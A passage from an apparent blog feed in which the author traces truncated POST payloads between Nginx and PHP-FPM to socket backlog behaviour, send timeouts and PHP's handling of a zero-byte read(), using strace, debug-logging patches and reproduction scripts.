Oct 12 10:43:07 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:08 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:09 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:17 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:18 test-server php: message repeated 2 times: [ JSON decode failed: 1041121 229376]
Oct 12 10:43:19 test-server php: JSON decode failed: 1041121 229376</code></pre><p></p><p></p><p>The truncated payload issues showing in <code>syslog</code> matched up to the late <code>accept()</code> calls from PHP! It was at this point I was prompted to look at the <code>backlog</code> parameter of <code>listen()</code> and it became clear that this behaviour can be explained by <code>backlog</code>, something I wasn&apos;t familiar with.</p><p></p><p><strong>int listen(int </strong><em>sockfd</em><strong>, int </strong><em>backlog</em><strong>);</strong></p><p>When calling <code>listen()</code>, the second parameter provided is <code>backlog</code>, which is described as follows in the <a href="https://man7.org/linux/man-pages/man2/listen.2.html?ref=scotthelme.co.uk" rel="noreferrer">docs</a>:</p><p></p><blockquote>The <em>backlog</em> argument defines the maximum length to which the<br>       queue of pending connections for <em>sockfd</em> may grow.</blockquote><p></p><p>So now we can have an application, like Nginx, call <code>connect()</code> and succeed without the application on the other side, PHP, ever calling <code>accept()</code>! This is finally starting to make a little more sense with the behaviour I&apos;m seeing.</p><p></p>
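<p>You can demonstrate this to yourself in a few lines of PHP. The sketch below is illustrative only, using a local TCP socket rather than PHP-FPM&apos;s UNIX socket: the server listens but never calls <code>accept()</code>, yet every client <code>connect()</code> still succeeds, because the kernel completes the handshake and parks the connection in the backlog queue.</p><pre><code class="language-php">&lt;?php
// Minimal demo of listen() backlog semantics (illustrative only).
// The server never calls accept(), but clients can still connect,
// and can even write until the socket&apos;s receive buffer fills up.
$server = stream_socket_server(&apos;tcp://127.0.0.1:9000&apos;, $errno, $errstr);

for ($i = 1; $i &lt;= 5; $i++) {
    $client = stream_socket_client(&apos;tcp://127.0.0.1:9000&apos;, $errno, $errstr, 1);
    echo &apos;connect() &apos; . ($client ? &apos;succeeded&apos; : &quot;failed: $errstr&quot;) . &quot;\n&quot;;
    if ($client) {
        // The kernel buffers this data even though nothing has accepted us yet.
        fwrite($client, str_repeat(&apos;x&apos;, 8192));
    }
}</code></pre><p></p>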
<p>It also turns out that Nginx can <code>write()</code> until the receive buffer on the socket is full, and that is when it&apos;s going to hit <code>EAGAIN</code>. I confirmed this using <code>strace</code>:</p><p></p><pre><code class="language-bash">cat nginx.strace | grep -E &apos;sendfile\(|connect\(|close\(|writev\(&apos;
75920 19:43:26 connect(3, {sa_family=AF_UNIX, sun_path=&quot;/run/php/php8.2-fpm.sock&quot;}, 110) = 0
75920 19:43:26 writev(3, [{iov_base=&quot;\1\1\0\1\0\10\0\0\0\1\0\0\0\0\0\0\1\4\0\1\2[\5\0\t\0PATH_I&quot;..., iov_len=648}], 1) = 648
75920 19:43:26 sendfile(3, 29, [0] =&gt; [32768], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [32768] =&gt; [65536], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [65536] =&gt; [98304], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [98304] =&gt; [131072], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [131072] =&gt; [163840], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [163840] =&gt; [196608], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [196608] =&gt; [229376], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = -1 EAGAIN (Resource temporarily unavailable)</code></pre><p></p><p></p><p>I believe that Nginx is using <code>writev()</code> to send the <code>fastcgi</code> headers, and using <code>sendfile()</code> to send chunks of the body, which comes from this function in the <a href="https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/os/unix/ngx_linux_sendfile_chain.c?ref=scotthelme.co.uk#L50" rel="noreferrer">code</a>. It certainly seems like this is starting to make a little sense. Looking at the PHP config, I wanted to see what the backlog value was because it&apos;s not something I ever recall setting. I found the following in our config:</p><p></p><pre><code class="language-config">; Set listen(2) backlog.
; Default Value: 511 (-1 on Linux, FreeBSD and OpenBSD)
;listen.backlog = 511</code></pre><p></p><p></p><p>With a default value of <code>-1</code>, I was guessing that <code>backlog</code> might be cast to an unsigned int by the kernel, which it is (<a href="https://github.com/torvalds/linux/blob/8bb7eca972ad531c9b149c0a51ab43a417385813/net/socket.c?ref=scotthelme.co.uk#L1722-L1723" rel="noreferrer">source</a>).</p><p></p><pre><code class="language-c">if ((unsigned int)backlog &gt; somaxconn)
	backlog = somaxconn;</code></pre><p></p><p></p><p>You can also see that, as stated in the manual (<a href="https://man7.org/linux/man-pages/man2/listen.2.html?ref=scotthelme.co.uk#:~:text=If%20the%20backlog%20argument%20is%20greater%20than%20the%20value%20in%0A%20%20%20%20%20%20%20/proc/sys/net/core/somaxconn%2C%20then%20it%20is%20silently%20capped%20to%20that%0A%20%20%20%20%20%20%20value" rel="noreferrer">source</a>), if the defined <code>backlog</code> value is greater than <code>somaxconn</code>, it will be silently truncated to that value. Because <code>-1</code> cast to an unsigned int is actually <code>4294967295</code>, PHP will, by default, always set <code>backlog</code> to the value of <code>somaxconn</code>, effectively letting the system decide.</p><p></p><pre><code class="language-bash"># cat /proc/sys/net/core/somaxconn
4096</code></pre><p></p><p></p><p>This means we can have up to <em>4,096 connections</em> pending in the backlog queue, which is quite a few!</p><p></p><h4 id="the-theory">The Theory</h4><p>At this point, I believe something like the following is happening during the lifecycle of the request.</p><p></p><ol><li>Nginx makes the <code>connect()</code> syscall and begins writing to the socket.</li><li>While PHP is able, it processes the initial requests. We see a small number of requests succeeding.</li><li>PHP becomes overloaded and stops processing new, inbound requests.</li><li>Nginx continues to make new connections and fill the socket buffer with data.</li><li>Once the receive buffer is full, Nginx will receive <code>EAGAIN</code> and likely wait for something like <code>fastcgi_send_timeout</code> (<a href="https://nginx.org/en/docs/http/ngx_http_fastcgi_module.html?ref=scotthelme.co.uk#fastcgi_send_timeout" rel="noreferrer">source</a>).</li><li>The send will time out and Nginx will close the connection. </li><li>PHP becomes available and accepts the connection, starting to read until the receive buffer has been consumed. </li><li>Once the buffer has been read, PHP will get <code>EPIPE</code> and process the content read from the buffer.</li></ol><p></p><p>Sounds logical, right? It should also be easy enough to test this now that I know what I&apos;m aiming for, so I tinkered with some of the config parameters in Nginx, and it did indeed seem that <code>fastcgi_send_timeout</code> was the main factor. By reducing the send timeout, I would see more requests failing to parse in general, and I assume that&apos;s because Nginx is timing out sooner so PHP has less time to get to the <code>backlog</code>.</p><p></p><h4 id="testing-the-theory">Testing The Theory!</h4><p>Now for the fun part, where you actually find out if you were right, or you were completely off the mark! I was looking into ways that I could reliably reproduce this, and my first effort took a few steps. I reduced the number of child processes PHP can spawn to one, so it would be easy to keep it busy, and I reduced the send timeout on Nginx to three seconds so it would time out very quickly. With this basic setup, I could send two requests sequentially: the first would succeed and the second would reliably fail, 100% of the time. I wanted something better than that though, something that would allow me to trigger this on a single request, and that&apos;s when <a href="https://twitter.com/poupas?ref=scotthelme.co.uk" rel="noreferrer">Jo&#xE3;o Poupino</a> dropped this <a href="https://gist.github.com/ScottHelme/87abff3292f3a1ea53ff373a2926e77b?ref=scotthelme.co.uk" rel="noreferrer">little gem</a> in Slack! </p><p></p><div class="gistcontainer" style="max-height: 300px; max-width: 80%; overflow: auto;">
  <script src="https://gist.github.com/ScottHelme/87abff3292f3a1ea53ff373a2926e77b.js"></script>
</div><p></p><p></p><p>This gives me the ability to talk directly to the PHP socket, using the FastCGI protocol, and completely cut Nginx out of the equation. The script also has a feature that allows you to send only a partial request, where it will randomly <code>close()</code> the socket somewhere during the transmission of the payload. With this, it should now be possible to reproduce this problem with only a single request. The moment of truth....</p><p></p><pre><code class="language-bash">python3 send-fastcgi-request.py unix:/run/php/php8.2-fpm.sock post.data --partial
[102935] Sending request 1/1
[102936] Connecting to unix:/run/php/php8.2-fpm.sock...
[102936] Sending 37 FastCGI records...
[102936]   * Sent record 1/37 (8 + 8 bytes)
[102936]   * Sent record 2/37 (8 + 512 bytes)
[102936]   * Sent record 3/37 (8 + 0 bytes)
[102936]   * Sent record 4/37 (8 + 32768 bytes)
[102936]   * Sent record 5/37 (8 + 32768 bytes)
[102936]   * Sent record 6/37 (8 + 32768 bytes)
[102936]   * Sent record 7/37 (8 + 32768 bytes)
[102936]   * Sent record 8/37 (8 + 32768 bytes)
[102936]   * Sent record 9/37 (8 + 32768 bytes)
[102936]   * Sent record 10/37 (8 + 32768 bytes)
[102936]   * Sent record 11/37 (8 + 32768 bytes)
[102936]   * Sent record 12/37 (8 + 32768 bytes)
[102936]   * Sent record 13/37 (8 + 32768 bytes)
[102936]   * Sent record 14/37 (8 + 32768 bytes)
[102936]   * Sent record 15/37 (8 + 32768 bytes)
[102936]   * Sent record 16/37 (8 + 32768 bytes)
[102936]   * Sent record 17/37 (8 + 32768 bytes)
[102936]   * Sent record 18/37 (8 + 32768 bytes)
[102936]   * Sent record 19/37 (8 + 32768 bytes)
[102936]   * Sent record 20/37 (8 + 32768 bytes)
[102936]   * Sent record 21/37 (8 + 32768 bytes)
[102936]   * Sent record 22/37 (8 + 32768 bytes)
[102936]   * Sent record 23/37 (8 + 32768 bytes)
[102936]   * Sent record 24/37 (8 + 32768 bytes)
[102936] Closing socket after record 24!</code></pre><p></p><p></p><p>The script started to send my large POST payload and decided to close the socket after sending only 24 out of the 37 chunks of the request. Time to check <code>syslog</code> and see if we can find what I&apos;m hoping for and expecting.</p><p></p><pre><code class="language-log">Oct 13 13:33:57 test-server php: POST data reading complete. Size: 688128 bytes (out of 1069923 bytes)
Oct 13 13:34:07 test-server php: JSON decode failed: 1069923 688128</code></pre><p></p><p></p><p>Finally! &#x1F37E;&#x1F942;</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/cheers.gif" class="kg-image" alt="Sockets - Under The Hood: Understanding Truncated Request Behaviour" loading="lazy" width="480" height="270"></figure><p></p><p></p><p>It feels awesome to get to the bottom of something that&apos;s been bugging you so much! I fixed the issue a whole two blog posts ago, and I could have moved on, but sometimes, I really just need to understand <em>why</em> something is happening, and honestly, it was quite a fun journey getting here. I owe a big thanks to Jo&#xE3;o and Ignat, who collectively must have saved me countless days of effort that I might not even have had time for.</p><p></p><p>I&apos;ve also skipped over a few of the debugging steps above because this was becoming another lengthy blog post, but I did, during and after debugging, spend a lot of time trawling through the Nginx source to understand fully what&apos;s happening and also just to confirm my understanding.</p><p></p><p>The Nginx behaviour of using <code>writev()</code> and <code>sendfile()</code> can be seen here: <a href="https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/os/unix/ngx_linux_sendfile_chain.c?ref=scotthelme.co.uk#L50">https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/os/unix/ngx_linux_sendfile_chain.c#L50</a></p><p>Nginx adds a timeout when receiving <code>EAGAIN</code> here, using <code>fastcgi_send_timeout</code>. I also noticed in the Nginx source that it makes use of <code>epoll()</code>, which explains earlier why I was only seeing a single <code>EAGAIN</code> per request: <a href="https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/http/ngx_http_upstream.c?ref=scotthelme.co.uk#L2093">https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/http/ngx_http_upstream.c#L2093</a></p><p>The event timer expires in Nginx here: <a href="https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/event/ngx_event_timer.c?ref=scotthelme.co.uk#L54">https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/event/ngx_event_timer.c#L54</a></p><p>I also spotted that PHP was respawning the child processes when I was testing and that they&apos;d always have new PIDs after a test run. It seems that if the child is idle for too long, PHP will kill and respawn it, possibly based on this timeout value: <a href="https://github.com/php/php-src/blob/47c6b3bd452d2932af5c2f021b10ab2aaed01fb1/sapi/fpm/fpm/fpm_conf.c?ref=scotthelme.co.uk#L622">https://github.com/php/php-src/blob/47c6b3bd452d2932af5c2f021b10ab2aaed01fb1/sapi/fpm/fpm/fpm_conf.c#L622</a></p><p></p><p>All in all, I can now say I&apos;m happy that I understand everything that was happening with this issue and can finally put it to bed!</p><p>As a final closing note, just to nicely close things off, I got a response on the <a href="https://github.com/php/php-src/issues/12343?ref=scotthelme.co.uk#issuecomment-1761494201" rel="noreferrer">PHP bug</a> that I filed in the previous blog post and it seems that this finding is indeed a bug and will be patched!</p><p></p>]]></content:encoded></item><item><title><![CDATA[Processing Truncated Requests? 
A PHP Debugging Deep Dive]]></title><description><![CDATA[<p>In my previous blog post, I came across a bug in <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a> that took some effort to debug and fully understand before I could fix it. Whilst I&apos;d identified what the issue was, and how it was happening, I never got to the bottom of <em>why</em> it</p>]]></description><link>https://scotthelme.co.uk/processing-truncated-requests-php-debugging-deep-dive/</link><guid isPermaLink="false">6516a33bef8f4c000157b05a</guid><category><![CDATA[Report URI]]></category><category><![CDATA[PHP]]></category><category><![CDATA[nginx]]></category><category><![CDATA[truncated-post-requests]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Mon, 02 Oct 2023 10:14:00 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/09/background.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/09/background.png" alt="Processing Truncated Requests? A PHP Debugging Deep Dive"><p>In my previous blog post, I came across a bug in <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a> that took some effort to debug and fully understand before I could fix it. Whilst I&apos;d identified what the issue was, and how it was happening, I never got to the bottom of <em>why</em> it was happening. In this post, I&apos;m going to delve into the PHP source to figure it out!</p><p></p><h4 id="truncated-post-requests">Truncated POST Requests</h4><p>If you haven&apos;t read my previous blog post, <a href="https://scotthelme.co.uk/unravelling-mystery-of-truncated-post-requests-report-uri/?ref=scotthelme.co.uk" rel="noreferrer">Unravelling The Mystery Of Truncated POST Requests On Report URI</a>, you should start there as it sets the scene for what I&apos;m investigating here. It&apos;s a bit lengthy, but it has all of the details that are required to understand the journey in this post. Just like in that previous post, I&apos;m investigating things outside of my area of knowledge, but sometimes, I have an itch that I just have to scratch, and this was one of those times!</p><p></p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/09/report-uri-full-1.svg" class="kg-image" alt="Processing Truncated Requests? A PHP Debugging Deep Dive" loading="lazy" width="300" height="58"></a></figure><p></p><h4 id="it-wasnt-nginx">It Wasn&apos;t Nginx</h4><p>At the end of the last blog post, I wasn&apos;t 100% sure whether Nginx was at fault, or whether PHP was at fault. Admittedly, I did have a feeling that it was going to be PHP that was responsible, but I hadn&apos;t tested my idea and didn&apos;t have any evidence, so I didn&apos;t share that view at the time. </p><p>The problem we had was that POST requests were coming through and by the time they got to PHP the payload was truncated, and that caused a failure in parsing the JSON payload because it was invalid. I knew that Nginx was receiving the full payload and we use the default value for <code>fastcgi_request_buffering</code> (<a href="https://nginx.org/en/docs/http/ngx_http_fastcgi_module.html?ref=scotthelme.co.uk#fastcgi_request_buffering" rel="noreferrer">link</a>) so &quot;the entire request body is read from the client before sending the request to a FastCGI server&quot;. 
I could verify this with some simple debug logging in Nginx, which I did, and the failure was happening between Nginx and PHP during the <code>fastcgi_pass</code>. Nginx has the full request body to pass; it&apos;s just not making it to the other side because the socket is closed before everything can be sent. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-17.png" class="kg-image" alt="Processing Truncated Requests? A PHP Debugging Deep Dive" loading="lazy" width="481" height="162"></figure><p></p><p>Previously, we were using a TCP socket between Nginx and PHP, and we were experiencing a lot of memory pressure on TCP resources. That resulted in an <code>out of memory -- consider tuning tcp_mem</code> error (<a href="https://elixir.bootlin.com/linux/v5.15.131/source/net/ipv4/tcp.c?ref=scotthelme.co.uk#L2735">source</a>) and Linux does warn us that it will &quot;kill&quot; sockets if there is &quot;strong memory pressure&quot; (<a href="https://elixir.bootlin.com/linux/v5.15.131/source/net/ipv4/tcp_timer.c?ref=scotthelme.co.uk#L99">source</a>).</p><p></p><pre><code class="language-c">bool tcp_check_oom(struct sock *sk, int shift)
{
	bool too_many_orphans, out_of_socket_memory;

	too_many_orphans = tcp_too_many_orphans(shift);
	out_of_socket_memory = tcp_out_of_memory(sk);
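	/* when tcp_out_of_memory() trips, the ratelimited warning below is the exact message we were seeing in syslog */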

	if (too_many_orphans)
		net_info_ratelimited(&quot;too many orphaned sockets\n&quot;);
	if (out_of_socket_memory)
		net_info_ratelimited(&quot;out of memory -- consider tuning tcp_mem\n&quot;);
	return too_many_orphans || out_of_socket_memory;
}</code></pre><p></p><pre><code class="language-c">/**
 *  tcp_out_of_resources() - Close socket if out of resources
 *  @sk:        pointer to current socket
 *  @do_reset:  send a last packet with reset flag
 *
 *  ...
 *
 *  Criteria is still not confirmed experimentally and may change.
 *  We kill the socket, if:
 *  1. If number of orphaned sockets exceeds an administratively configured
 *     limit.
 *  2. If we have strong memory pressure.
 *  3. If our net namespace is exiting.
 */
static int tcp_out_of_resources(struct sock *sk, bool do_reset)
{</code></pre><p></p><p></p><p>Since we swapped away from a TCP socket to a Unix socket, the same problem could still be reproduced, but instead by pressuring PHP.</p><p></p><h4 id="reproducing-the-error-with-a-unix-socket">Reproducing the error with a Unix Socket</h4><p>Using the same slow script from the previous blog, with a small tweak to remove the outbound TCP connection, we can keep all of the PHP processes busy easily.</p><p></p><pre><code class="language-php">sleep(30);
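// Hold this worker for 30 seconds; with every child process busy sleeping, none is free to accept() the next connection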

$json = json_decode(file_get_contents(&apos;php://input&apos;));
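// php://input can be read more than once, so the logging below sees the same (possibly truncated) body that was decoded here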

if ($json == null) {
  syslog(LOG_WARNING, &quot;JSON decode failed: &quot; . $_SERVER[&apos;CONTENT_LENGTH&apos;] . &quot; &quot; . strlen(file_get_contents(&apos;php://input&apos;)));
}</code></pre><p></p><p></p><p>I then tweaked the Nginx config so that it would timeout on <code>fastcgi</code> operations quickly.</p><p></p><pre><code class="language-nginx">fastcgi_connect_timeout 3s;
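# fail the FastCGI connect and send quickly so the truncation is easy to trigger on demand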
fastcgi_send_timeout 3s;</code></pre><p></p><p></p><p>The new Nginx config, coupled with the really long running PHP scripts, means that it will be easy to get Nginx to start timing out on the <code>fastcgi_pass</code> and that&apos;s when the error occurs.</p><p></p><h4 id="debugging-php">Debugging PHP</h4><p>Fortunately, I had quite a specific area of the <a href="https://github.com/php/php-src?ref=scotthelme.co.uk" rel="noreferrer">php-src</a> I&apos;d need to look at to investigate so this would help me narrow down quite quickly. We&apos;re running <code>v8.2.10</code> in production on Report URI and I&apos;ve also verified my findings here against the latest 8.2 branch which is <code>v8.2.11</code> at the time of writing. I will do my work here against that branch.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-16.png" class="kg-image" alt="Processing Truncated Requests? A PHP Debugging Deep Dive" loading="lazy" width="320" height="173"></figure><p></p><p>Following the processing of a request, we go through:</p><p><a href="https://github.com/php/php-src/blob/494d9e1f3199c529e974ec966ce8efee6d1b3a0c/main/main.c?ref=scotthelme.co.uk#L1714" rel="noreferrer">php_request_startup()<br></a><a href="https://github.com/php/php-src/blob/494d9e1f3199c529e974ec966ce8efee6d1b3a0c/main/main.c?ref=scotthelme.co.uk#L1748" rel="noreferrer">sapi_activate()<br></a><a href="https://github.com/php/php-src/blob/14b827049aed9fbd33df84f3428b98f27a7b216e/main/SAPI.c?ref=scotthelme.co.uk#L469" rel="noreferrer">sapi_read_post_data()</a> <br><a href="https://github.com/php/php-src/blob/dcee59eb331e34dea021358bfc9fc178981e7dca/main/SAPI.c?ref=scotthelme.co.uk#L256" rel="noreferrer">SAPI_POST_READER_FUNC()<br></a><a href="https://github.com/php/php-src/blob/dcee59eb331e34dea021358bfc9fc178981e7dca/main/SAPI.c?ref=scotthelme.co.uk#L273" rel="noreferrer">sapi_read_post_block()</a> <br><a href="https://github.com/php/php-src/blob/dcee59eb331e34dea021358bfc9fc178981e7dca/main/SAPI.c?ref=scotthelme.co.uk#L242" rel="noreferrer">sapi_module.read_post()</a> <br><a href="https://github.com/php/php-src/blob/1c93cdcea430b77a28b4a552a350cd84484f7259/sapi/cgi/cgi_main.c?ref=scotthelme.co.uk#L503" rel="noreferrer">sapi_fcgi_read_post()</a> <br><a href="https://github.com/php/php-src/blob/1c93cdcea430b77a28b4a552a350cd84484f7259/main/fastcgi.c?ref=scotthelme.co.uk#L1213" rel="noreferrer">fcgi_read()</a> <br><a href="https://github.com/php/php-src/blob/1c93cdcea430b77a28b4a552a350cd84484f7259/main/fastcgi.c?ref=scotthelme.co.uk#L954" rel="noreferrer">safe_read()</a></p><p>In <code>safe_read()</code>, we make the final system call to <a href="https://man7.org/linux/man-pages/man2/read.2.html?ref=scotthelme.co.uk" rel="noreferrer">read()</a>, to read data from the socket. I&apos;ve snipped the WIN32 code for ease of reading because it isn&apos;t relevant here.</p><p></p><pre><code class="language-c">static inline ssize_t safe_read(fcgi_request *req, const void *buf, size_t count)
{
	int    ret;
	size_t n = 0;

	do {
#ifdef _WIN32
		/* snip */
#endif
		errno = 0;
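		/* reset errno so a zero-byte read below can be reliably told apart from an error */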
#ifdef _WIN32
		/* snip */
#else
		ret = read(req-&gt;fd, ((char*)buf)+n, count-n);
#endif
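		/* a return of 0 with errno still 0 is end-of-file; on a socket, that means the peer closed the connection, even if fewer than count bytes ever arrived */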
		if (ret &gt; 0) {
			n += ret;
		} else if (ret == 0 &amp;&amp; errno == 0) {
			return n;
		} else if (ret &lt;= 0 &amp;&amp; errno != 0 &amp;&amp; errno != EINTR) {
			return ret;
		}
	} while (n != count);
	return n;
}</code></pre><p></p><p>Looking at the manual page for <code>read()</code>, I notice a couple of things that stand out in Description and later in Return Value: </p><blockquote>If the file offset is at or past the end of file, no bytes are read, and read() returns zero.</blockquote><blockquote>On success, the number of bytes read is returned (zero indicates end of file)</blockquote><p></p><p>The PHP source has handling for <code>ret</code> being zero, and also checks <code>errno</code> in the two <code>else if</code> statements, but I wasn&apos;t sure what was being returned by <code>read()</code>. I decided to add some of my own logging to see exactly what was going on by patching PHP. I spun up a test server with some hefty resources so I&apos;d be able to build PHP quickly and set it up as follows.</p><p></p><pre><code class="language-bash">add-apt-repository ppa:ondrej/php
add-apt-repository ppa:ondrej/nginx
apt update
apt install nginx php8.2 php8.2-cli php8.2-common php8.2-curl php8.2-fpm php8.2-gd php8.2-igbinary php8.2-intl php8.2-mbstring php8.2-soap php8.2-xml php8.2-zip php8.2-redis
apt upgrade -y
reboot

mkdir build
cd build
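# enable the commented-out deb-src entries for the ondrej PPA so apt can fetch the PHP sources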
sudo sed -i &apos;s/^#\s*\(.*\)/\1/&apos; /etc/apt/sources.list.d/ondrej-ubuntu-php-jammy.list
sudo apt-get update -y
sudo apt-get install -y devscripts build-essential fakeroot
sudo apt-get build-dep -y php8.2-fpm
apt-get source -y php8.2-fpm
cd php8.2-8.2.10
dpkg-buildpackage -rfakeroot -uc</code></pre><p></p><p>Even running on a hefty VPS with 16x Intel vCPU, 32 GB RAM and a 200 GB NVMe drive, it still took a little over 30 minutes to build, but it was ready. I made the following patch for <code>main/fastcgi.c</code>:</p><p></p><pre><code class="language-c">--- fastcgi.c.orig      2023-09-29 10:06:52.180803585 +0000
+++ fastcgi.c   2023-09-29 10:06:15.932395211 +0000
@@ -982,8 +982,10 @@
                if (ret &gt; 0) {
                        n += ret;
                } else if (ret == 0 &amp;&amp; errno == 0) {
+                       php_syslog(LOG_NOTICE, &quot;errno 0: %s&quot;, strerror(errno));
                        return n;
                } else if (ret &lt;= 0 &amp;&amp; errno != 0 &amp;&amp; errno != EINTR) {
+                       php_syslog(LOG_NOTICE, &quot;errno non-0: %s&quot;, strerror(errno));
                        return ret;
                }
        } while (n != count);</code></pre><p></p><p>I used <a href="https://man7.org/linux/man-pages/man3/strerror.3.html?ref=scotthelme.co.uk" rel="noreferrer">strerror()</a> to get the string version of the error number for ease of reading and I also wanted to monitor the progress of reading chunks from the socket too. I made another patch for <code>main/SAPI.c</code>:</p><p></p><pre><code class="language-c">--- SAPI.c.orig 2023-09-29 12:32:46.020740222 +0000
+++ SAPI.c      2023-09-29 12:34:35.769896620 +0000
@@ -248,6 +248,9 @@
                SG(post_read) = 1;
        }

+       php_syslog(LOG_NOTICE, &quot;Read %zu bytes (&quot; ZEND_LONG_FMT &quot; bytes remaining)&quot;,
+                       read_bytes, SG(request_info).content_length - SG(read_post_bytes));
+
        return read_bytes;
 }

@@ -285,6 +288,7 @@
                        }

                        if (read_bytes &lt; SAPI_POST_BLOCK_SIZE) {
+                               php_syslog(LOG_NOTICE, &quot;POST data reading complete. Size: &quot; ZEND_LONG_FMT &quot; bytes (out of &quot; ZEND_LONG_FMT &quot; bytes)&quot;, SG(read_post_bytes), SG(request_info).content_length);
                                break;
                        }
                }</code></pre><p></p><p>Now it was just a case of running <code>make</code> to incorporate my changes and overwrite the existing binary.</p><p></p><pre><code class="language-bash">cd fpm-build
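# only the patched files are recompiled, so this is much quicker than the initial build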
make
systemctl stop php8.2-fpm.service
cp ./sapi/fpm/php-fpm /usr/sbin/php-fpm8.2
systemctl start php8.2-fpm.service</code></pre><p></p><p>All I had to do then was cause the issue and check syslog for the errors. I&apos;ve tidied up a snippet here and removed unrelated entries.</p><p></p><pre><code class="language-log">Sep 28 21:13:30 test-server php: Read 16384 bytes (1043937 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (1027553 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (1011169 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (994785 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (978401 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (962017 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (945633 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (929249 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (912865 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (896481 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (880097 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (863713 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (847329 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (830945 bytes remaining)
Sep 28 21:13:30 test-server php: errno 0: Success
Sep 28 21:13:30 test-server php: Read 0 bytes (830945 bytes remaining)
Sep 28 21:13:30 test-server php: POST data reading complete. Size: 229376 bytes (out of 1060321 bytes)
Sep 28 21:13:30 test-server php: JSON decode failed: 1060321 229376</code></pre><p></p><p>Gotcha! &#x1F60E;</p><p></p><h4 id="but-we-didnt-get-everything">But we didn&apos;t get everything?</h4><p>At least now I can finally understand what&apos;s happening. Because PHP thinks it is hitting EOF, before it should, it&apos;s beginning to process the request without having the entire payload. What surprises me is that PHP <em>knows</em> it hasn&apos;t got all of the request payload, but it continues anyway. This is the part where I can&apos;t decide what it should do, but, saying &quot;hey, 50% of this payload is missing, let&apos;s go!&quot;, is what caught me out here. </p><p>To try and determine why the truncation is happening at a particular size, I&apos;d spotted that <a href="https://github.com/php/php-src/blob/dcee59eb331e34dea021358bfc9fc178981e7dca/main/SAPI.c?ref=scotthelme.co.uk#L273" rel="noreferrer">sapi_read_post_block()</a> was using <code>SAPI_POST_BLOCK_SIZE</code>, defined as <code>#define SAPI_POST_BLOCK_SIZE 0x4000</code>, or, converting that to decimal, <code>16,384</code>... Going back to the previous blog post, the POST payload was consistently being truncated at <code>65,536</code> bytes, which is <code>16,384 * 4 = 65,536</code>, so a possible cause for the specific size of the truncation? I&apos;m not so sure, because, when using TCP sockets, tweaking the values for <code>/proc/sys/net/ipv4/tcp_rmem</code> will change the size of the truncation, and the truncated size is not always a multiple of <code>16,384</code>. Also, when we switched to the Unix socket from the TCP socket, the size of the truncated payload changed to <code>229,376</code>, which closely aligns with <code>/proc/sys/net/core/[rw]mem_default</code> defined <a href="https://elixir.bootlin.com/linux/v5.15.131/source/include/net/sock.h?ref=scotthelme.co.uk#L2816" rel="noreferrer">here</a>. I even patched PHP again to modify <code>SAPI_POST_BLOCK_SIZE</code>, but that didn&apos;t have an impact on the size of the truncated payload. At this point, it&apos;s still not clear, but I know PHP will read from the socket until all of the data is read; what changes is how much data is there.</p><p>Once the <code>read()</code> system call in <code>safe_read()</code> returns <code>0</code>, we&apos;re going all the way back up the call stack to <code>SAPI_POST_READER_FUNC()</code> before any checking of the payload size takes place. In this function, there are only three checks taking place, and only one relates to the size of the payload (<a 